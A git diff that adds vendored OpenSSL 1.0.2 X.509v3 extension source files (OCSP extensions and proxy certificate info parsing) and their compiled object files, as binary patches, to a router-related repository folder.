+# include <openssl/ocsp.h>
+# include <openssl/x509v3.h>
+
+/*
+ * OCSP extensions and a couple of CRL entry extensions
+ */
+
+static int i2r_ocsp_crlid(const X509V3_EXT_METHOD *method, void *nonce,
+                          BIO *out, int indent);
+static int i2r_ocsp_acutoff(const X509V3_EXT_METHOD *method, void *nonce,
+                            BIO *out, int indent);
+static int i2r_object(const X509V3_EXT_METHOD *method, void *obj, BIO *out,
+                      int indent);
+
+static void *ocsp_nonce_new(void);
+static int i2d_ocsp_nonce(void *a, unsigned char **pp);
+static void *d2i_ocsp_nonce(void *a, const unsigned char **pp, long length);
+static void ocsp_nonce_free(void *a);
+static int i2r_ocsp_nonce(const X509V3_EXT_METHOD *method, void *nonce,
+                          BIO *out, int indent);
+
+static int i2r_ocsp_nocheck(const X509V3_EXT_METHOD *method,
+                            void *nocheck, BIO *out, int indent);
+static void *s2i_ocsp_nocheck(const X509V3_EXT_METHOD *method,
+                              X509V3_CTX *ctx, const char *str);
+static int i2r_ocsp_serviceloc(const X509V3_EXT_METHOD *method, void *in,
+                               BIO *bp, int ind);
+
+const X509V3_EXT_METHOD v3_ocsp_crlid = {
+    NID_id_pkix_OCSP_CrlID, 0, ASN1_ITEM_ref(OCSP_CRLID),
+    0, 0, 0, 0,
+    0, 0,
+    0, 0,
+    i2r_ocsp_crlid, 0,
+    NULL
+};
+
+const X509V3_EXT_METHOD v3_ocsp_acutoff = {
+    NID_id_pkix_OCSP_archiveCutoff, 0, ASN1_ITEM_ref(ASN1_GENERALIZEDTIME),
+    0, 0, 0, 0,
+    0, 0,
+    0, 0,
+    i2r_ocsp_acutoff, 0,
+    NULL
+};
+
+const X509V3_EXT_METHOD v3_crl_invdate = {
+    NID_invalidity_date, 0, ASN1_ITEM_ref(ASN1_GENERALIZEDTIME),
+    0, 0, 0, 0,
+    0, 0,
+    0, 0,
+    i2r_ocsp_acutoff, 0,
+    NULL
+};
+
+const X509V3_EXT_METHOD v3_crl_hold = {
+    NID_hold_instruction_code, 0, ASN1_ITEM_ref(ASN1_OBJECT),
+    0, 0, 0, 0,
+    0, 0,
+    0, 0,
+    i2r_object, 0,
+    NULL
+};
+
+const X509V3_EXT_METHOD v3_ocsp_nonce = {
+    NID_id_pkix_OCSP_Nonce, 0, NULL,
+    ocsp_nonce_new,
+    ocsp_nonce_free,
+    d2i_ocsp_nonce,
+    i2d_ocsp_nonce,
+    0, 0,
+    0, 0,
+    i2r_ocsp_nonce, 0,
+    NULL
+};
+
+const X509V3_EXT_METHOD v3_ocsp_nocheck = {
+    NID_id_pkix_OCSP_noCheck, 0, ASN1_ITEM_ref(ASN1_NULL),
+    0, 0, 0, 0,
+    0, s2i_ocsp_nocheck,
+    0, 0,
+    i2r_ocsp_nocheck, 0,
+    NULL
+};
+
+const X509V3_EXT_METHOD v3_ocsp_serviceloc = {
+    NID_id_pkix_OCSP_serviceLocator, 0, ASN1_ITEM_ref(OCSP_SERVICELOC),
+    0, 0, 0, 0,
+    0, 0,
+    0, 0,
+    i2r_ocsp_serviceloc, 0,
+    NULL
+};
+
+static int i2r_ocsp_crlid(const X509V3_EXT_METHOD *method, void *in, BIO *bp,
+                          int ind)
+{
+    OCSP_CRLID *a = in;
+    if (a->crlUrl) {
+        if (BIO_printf(bp, "%*scrlUrl: ", ind, "") <= 0)
+            goto err;
+        if (!ASN1_STRING_print(bp, (ASN1_STRING *)a->crlUrl))
+            goto err;
+        if (BIO_write(bp, "\n", 1) <= 0)
+            goto err;
+    }
+    if (a->crlNum) {
+        if (BIO_printf(bp, "%*scrlNum: ", ind, "") <= 0)
+            goto err;
+        if (i2a_ASN1_INTEGER(bp, a->crlNum) <= 0)
+            goto err;
+        if (BIO_write(bp, "\n", 1) <= 0)
+            goto err;
+    }
+    if (a->crlTime) {
+        if (BIO_printf(bp, "%*scrlTime: ", ind, "") <= 0)
+            goto err;
+        if (!ASN1_GENERALIZEDTIME_print(bp, a->crlTime))
+            goto err;
+        if (BIO_write(bp, "\n", 1) <= 0)
+            goto err;
+    }
+    return 1;
+ err:
+    return 0;
+}
+
+static int i2r_ocsp_acutoff(const X509V3_EXT_METHOD *method, void *cutoff,
+                            BIO *bp, int ind)
+{
+    if (BIO_printf(bp, "%*s", ind, "") <= 0)
+        return 0;
+    if (!ASN1_GENERALIZEDTIME_print(bp, cutoff))
+        return 0;
+    return 1;
+}
+
+static int i2r_object(const X509V3_EXT_METHOD *method, void *oid, BIO *bp,
+                      int ind)
+{
+    if (BIO_printf(bp, "%*s", ind, "") <= 0)
+        return 0;
+    if (i2a_ASN1_OBJECT(bp, oid) <= 0)
+        return 0;
+    return 1;
+}
+
+/*
+ * OCSP nonce. This is needs special treatment because it doesn't have an
+ * ASN1 encoding at all: it just contains arbitrary data.
+ */
+
+static void *ocsp_nonce_new(void)
+{
+    return ASN1_OCTET_STRING_new();
+}
+
+static int i2d_ocsp_nonce(void *a, unsigned char **pp)
+{
+    ASN1_OCTET_STRING *os = a;
+    if (pp) {
+        memcpy(*pp, os->data, os->length);
+        *pp += os->length;
+    }
+    return os->length;
+}
+
+static void *d2i_ocsp_nonce(void *a, const unsigned char **pp, long length)
+{
+    ASN1_OCTET_STRING *os, **pos;
+    pos = a;
+    if (!pos || !*pos)
+        os = ASN1_OCTET_STRING_new();
+    else
+        os = *pos;
+    if (!ASN1_OCTET_STRING_set(os, *pp, length))
+        goto err;
+
+    *pp += length;
+
+    if (pos)
+        *pos = os;
+    return os;
+
+ err:
+    if (os && (!pos || (*pos != os)))
+        M_ASN1_OCTET_STRING_free(os);
+    OCSPerr(OCSP_F_D2I_OCSP_NONCE, ERR_R_MALLOC_FAILURE);
+    return NULL;
+}
+
+static void ocsp_nonce_free(void *a)
+{
+    M_ASN1_OCTET_STRING_free(a);
+}
+
+static int i2r_ocsp_nonce(const X509V3_EXT_METHOD *method, void *nonce,
+                          BIO *out, int indent)
+{
+    if (BIO_printf(out, "%*s", indent, "") <= 0)
+        return 0;
+    if (i2a_ASN1_STRING(out, nonce, V_ASN1_OCTET_STRING) <= 0)
+        return 0;
+    return 1;
+}
+
+/* Nocheck is just a single NULL. Don't print anything and always set it */
+
+static int i2r_ocsp_nocheck(const X509V3_EXT_METHOD *method, void *nocheck,
+                            BIO *out, int indent)
+{
+    return 1;
+}
+
+static void *s2i_ocsp_nocheck(const X509V3_EXT_METHOD *method,
+                              X509V3_CTX *ctx, const char *str)
+{
+    return ASN1_NULL_new();
+}
+
+static int i2r_ocsp_serviceloc(const X509V3_EXT_METHOD *method, void *in,
+                               BIO *bp, int ind)
+{
+    int i;
+    OCSP_SERVICELOC *a = in;
+    ACCESS_DESCRIPTION *ad;
+
+    if (BIO_printf(bp, "%*sIssuer: ", ind, "") <= 0)
+        goto err;
+    if (X509_NAME_print_ex(bp, a->issuer, 0, XN_FLAG_ONELINE) <= 0)
+        goto err;
+    for (i = 0; i < sk_ACCESS_DESCRIPTION_num(a->locator); i++) {
+        ad = sk_ACCESS_DESCRIPTION_value(a->locator, i);
+        if (BIO_printf(bp, "\n%*s", (2 * ind), "") <= 0)
+            goto err;
+        if (i2a_ASN1_OBJECT(bp, ad->method) <= 0)
+            goto err;
+        if (BIO_puts(bp, " - ") <= 0)
+            goto err;
+        if (GENERAL_NAME_print(bp, ad->location) <= 0)
+            goto err;
+    }
+    return 1;
+ err:
+    return 0;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ocsp.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_ocsp.o
new file mode 100644
index 0000000000000000000000000000000000000000..99a5cf0d76317c3f917fb7a8b257cc8534eebf49
GIT binary patch
literal 7872
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
R{|Fx1!G0Vh(|5i7e*hK$)Z737

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pci.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pci.c
new file mode 100644
index 0000000..fe0d806
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pci.c
@@ -0,0 +1,317 @@
+/* v3_pci.c -*- mode:C; c-file-style: "eay" -*- */
+/*
+ * Contributed to the OpenSSL Project 2004 by Richard Levitte
+ * (richard@levitte.org)
+ */
+/* Copyright (c) 2004 Kungliga Tekniska Högskolan
+ * (Royal Institute of Technology, Stockholm, Sweden).
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ *
+ * 3. Neither the name of the Institute nor the names of its contributors
+ *    may be used to endorse or promote products derived from this software
+ *    without specific prior written permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE INSTITUTE AND CONTRIBUTORS ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE INSTITUTE OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/x509v3.h>
+
+static int i2r_pci(X509V3_EXT_METHOD *method, PROXY_CERT_INFO_EXTENSION *ext,
+                   BIO *out, int indent);
+static PROXY_CERT_INFO_EXTENSION *r2i_pci(X509V3_EXT_METHOD *method,
+                                          X509V3_CTX *ctx, char *str);
+
+const X509V3_EXT_METHOD v3_pci =
+    { NID_proxyCertInfo, 0, ASN1_ITEM_ref(PROXY_CERT_INFO_EXTENSION),
+    0, 0, 0, 0,
+    0, 0,
+    NULL, NULL,
+    (X509V3_EXT_I2R)i2r_pci,
+    (X509V3_EXT_R2I)r2i_pci,
+    NULL,
+};
+
+static int i2r_pci(X509V3_EXT_METHOD *method, PROXY_CERT_INFO_EXTENSION *pci,
+                   BIO *out, int indent)
+{
+    BIO_printf(out, "%*sPath Length Constraint: ", indent, "");
+    if (pci->pcPathLengthConstraint)
+        i2a_ASN1_INTEGER(out, pci->pcPathLengthConstraint);
+    else
+        BIO_printf(out, "infinite");
+    BIO_puts(out, "\n");
+    BIO_printf(out, "%*sPolicy Language: ", indent, "");
+    i2a_ASN1_OBJECT(out, pci->proxyPolicy->policyLanguage);
+    BIO_puts(out, "\n");
+    if (pci->proxyPolicy->policy && pci->proxyPolicy->policy->data)
+        BIO_printf(out, "%*sPolicy Text: %s\n", indent, "",
+                   pci->proxyPolicy->policy->data);
+    return 1;
+}
+
+static int process_pci_value(CONF_VALUE *val,
+                             ASN1_OBJECT **language, ASN1_INTEGER **pathlen,
+                             ASN1_OCTET_STRING **policy)
+{
+    int free_policy = 0;
+
+    if (strcmp(val->name, "language") == 0) {
+        if (*language) {
+            X509V3err(X509V3_F_PROCESS_PCI_VALUE,
+                      X509V3_R_POLICY_LANGUAGE_ALREADY_DEFINED);
+            X509V3_conf_err(val);
+            return 0;
+        }
+        if (!(*language = OBJ_txt2obj(val->value, 0))) {
+            X509V3err(X509V3_F_PROCESS_PCI_VALUE,
+                      X509V3_R_INVALID_OBJECT_IDENTIFIER);
+            X509V3_conf_err(val);
+            return 0;
+        }
+    } else if (strcmp(val->name, "pathlen") == 0) {
+        if (*pathlen) {
+            X509V3err(X509V3_F_PROCESS_PCI_VALUE,
+                      X509V3_R_POLICY_PATH_LENGTH_ALREADY_DEFINED);
+            X509V3_conf_err(val);
+            return 0;
+        }
+        if (!X509V3_get_value_int(val, pathlen)) {
+            X509V3err(X509V3_F_PROCESS_PCI_VALUE,
+                      X509V3_R_POLICY_PATH_LENGTH);
+            X509V3_conf_err(val);
+            return 0;
+        }
+    } else if (strcmp(val->name, "policy") == 0) {
+        unsigned char *tmp_data = NULL;
+        long val_len;
+        if (!*policy) {
+            *policy = ASN1_OCTET_STRING_new();
+            if (!*policy) {
+                X509V3err(X509V3_F_PROCESS_PCI_VALUE, ERR_R_MALLOC_FAILURE);
+                X509V3_conf_err(val);
+                return 0;
+            }
+            free_policy = 1;
+        }
+        if (strncmp(val->value, "hex:", 4) == 0) {
+            unsigned char *tmp_data2 =
+                string_to_hex(val->value + 4, &val_len);
+
+            if (!tmp_data2) {
+                X509V3err(X509V3_F_PROCESS_PCI_VALUE,
+                          X509V3_R_ILLEGAL_HEX_DIGIT);
+                X509V3_conf_err(val);
+                goto err;
+            }
+
+            tmp_data = OPENSSL_realloc((*policy)->data,
+                                       (*policy)->length + val_len + 1);
+            if (tmp_data) {
+                (*policy)->data = tmp_data;
+                memcpy(&(*policy)->data[(*policy)->length],
+                       tmp_data2, val_len);
+                (*policy)->length += val_len;
+                (*policy)->data[(*policy)->length] = '\0';
+            } else {
+                OPENSSL_free(tmp_data2);
+                /*
+                 * realloc failure implies the original data space is b0rked
+                 * too!
+                 */
+                (*policy)->data = NULL;
+                (*policy)->length = 0;
+                X509V3err(X509V3_F_PROCESS_PCI_VALUE, ERR_R_MALLOC_FAILURE);
+                X509V3_conf_err(val);
+                goto err;
+            }
+            OPENSSL_free(tmp_data2);
+        } else if (strncmp(val->value, "file:", 5) == 0) {
+            unsigned char buf[2048];
+            int n;
+            BIO *b = BIO_new_file(val->value + 5, "r");
+            if (!b) {
+                X509V3err(X509V3_F_PROCESS_PCI_VALUE, ERR_R_BIO_LIB);
+                X509V3_conf_err(val);
+                goto err;
+            }
+            while ((n = BIO_read(b, buf, sizeof(buf))) > 0
+                   || (n == 0 && BIO_should_retry(b))) {
+                if (!n)
+                    continue;
+
+                tmp_data = OPENSSL_realloc((*policy)->data,
+                                           (*policy)->length + n + 1);
+
+                if (!tmp_data)
+                    break;
+
+                (*policy)->data = tmp_data;
+                memcpy(&(*policy)->data[(*policy)->length], buf, n);
+                (*policy)->length += n;
+                (*policy)->data[(*policy)->length] = '\0';
+            }
+            BIO_free_all(b);
+
+            if (n < 0) {
+                X509V3err(X509V3_F_PROCESS_PCI_VALUE, ERR_R_BIO_LIB);
+                X509V3_conf_err(val);
+                goto err;
+            }
+        } else if (strncmp(val->value, "text:", 5) == 0) {
+            val_len = strlen(val->value + 5);
+            tmp_data = OPENSSL_realloc((*policy)->data,
+                                       (*policy)->length + val_len + 1);
+            if (tmp_data) {
+                (*policy)->data = tmp_data;
+                memcpy(&(*policy)->data[(*policy)->length],
+                       val->value + 5, val_len);
+                (*policy)->length += val_len;
+                (*policy)->data[(*policy)->length] = '\0';
+            } else {
+                /*
+                 * realloc failure implies the original data space is b0rked
+                 * too!
+                 */
+                (*policy)->data = NULL;
+                (*policy)->length = 0;
+                X509V3err(X509V3_F_PROCESS_PCI_VALUE, ERR_R_MALLOC_FAILURE);
+                X509V3_conf_err(val);
+                goto err;
+            }
+        } else {
+            X509V3err(X509V3_F_PROCESS_PCI_VALUE,
+                      X509V3_R_INCORRECT_POLICY_SYNTAX_TAG);
+            X509V3_conf_err(val);
+            goto err;
+        }
+        if (!tmp_data) {
+            X509V3err(X509V3_F_PROCESS_PCI_VALUE, ERR_R_MALLOC_FAILURE);
+            X509V3_conf_err(val);
+            goto err;
+        }
+    }
+    return 1;
+ err:
+    if (free_policy) {
+        ASN1_OCTET_STRING_free(*policy);
+        *policy = NULL;
+    }
+    return 0;
+}
+
+static PROXY_CERT_INFO_EXTENSION *r2i_pci(X509V3_EXT_METHOD *method,
+                                          X509V3_CTX *ctx, char *value)
+{
+    PROXY_CERT_INFO_EXTENSION *pci = NULL;
+    STACK_OF(CONF_VALUE) *vals;
+    ASN1_OBJECT *language = NULL;
+    ASN1_INTEGER *pathlen = NULL;
+    ASN1_OCTET_STRING *policy = NULL;
+    int i, j;
+
+    vals = X509V3_parse_list(value);
+    for (i = 0; i < sk_CONF_VALUE_num(vals); i++) {
+        CONF_VALUE *cnf = sk_CONF_VALUE_value(vals, i);
+        if (!cnf->name || (*cnf->name != '@' && !cnf->value)) {
+            X509V3err(X509V3_F_R2I_PCI,
+                      X509V3_R_INVALID_PROXY_POLICY_SETTING);
+            X509V3_conf_err(cnf);
+            goto err;
+        }
+        if (*cnf->name == '@') {
+            STACK_OF(CONF_VALUE) *sect;
+            int success_p = 1;
+
+            sect = X509V3_get_section(ctx, cnf->name + 1);
+            if (!sect) {
+                X509V3err(X509V3_F_R2I_PCI, X509V3_R_INVALID_SECTION);
+                X509V3_conf_err(cnf);
+                goto err;
+            }
+            for (j = 0; success_p && j < sk_CONF_VALUE_num(sect); j++) {
+                success_p =
+                    process_pci_value(sk_CONF_VALUE_value(sect, j),
+                                      &language, &pathlen, &policy);
+            }
+            X509V3_section_free(ctx, sect);
+            if (!success_p)
+                goto err;
+        } else {
+            if (!process_pci_value(cnf, &language, &pathlen, &policy)) {
+                X509V3_conf_err(cnf);
+                goto err;
+            }
+        }
+    }
+
+    /* Language is mandatory */
+    if (!language) {
+        X509V3err(X509V3_F_R2I_PCI,
+                  X509V3_R_NO_PROXY_CERT_POLICY_LANGUAGE_DEFINED);
+        goto err;
+    }
+    i = OBJ_obj2nid(language);
+    if ((i == NID_Independent || i == NID_id_ppl_inheritAll) && policy) {
+        X509V3err(X509V3_F_R2I_PCI,
+                  X509V3_R_POLICY_WHEN_PROXY_LANGUAGE_REQUIRES_NO_POLICY);
+        goto err;
+    }
+
+    pci = PROXY_CERT_INFO_EXTENSION_new();
+    if (!pci) {
+        X509V3err(X509V3_F_R2I_PCI, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    pci->proxyPolicy->policyLanguage = language;
+    language = NULL;
+    pci->proxyPolicy->policy = policy;
+    policy = NULL;
+    pci->pcPathLengthConstraint = pathlen;
+    pathlen = NULL;
+    goto end;
+ err:
+    if (language) {
+        ASN1_OBJECT_free(language);
+        language = NULL;
+    }
+    if (pathlen) {
+        ASN1_INTEGER_free(pathlen);
+        pathlen = NULL;
+    }
+    if (policy) {
+        ASN1_OCTET_STRING_free(policy);
+        policy = NULL;
+    }
+    if (pci) {
+        PROXY_CERT_INFO_EXTENSION_free(pci);
+        pci = NULL;
+    }
+ end:
+    sk_CONF_VALUE_pop_free(vals, X509V3_conf_free);
+    return pci;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pci.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_pci.o
new file mode 100644
index 0000000000000000000000000000000000000000..f272391cc34411ced7f72ee025504c95ad9dc38a
GIT binary patch
literal 8240
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
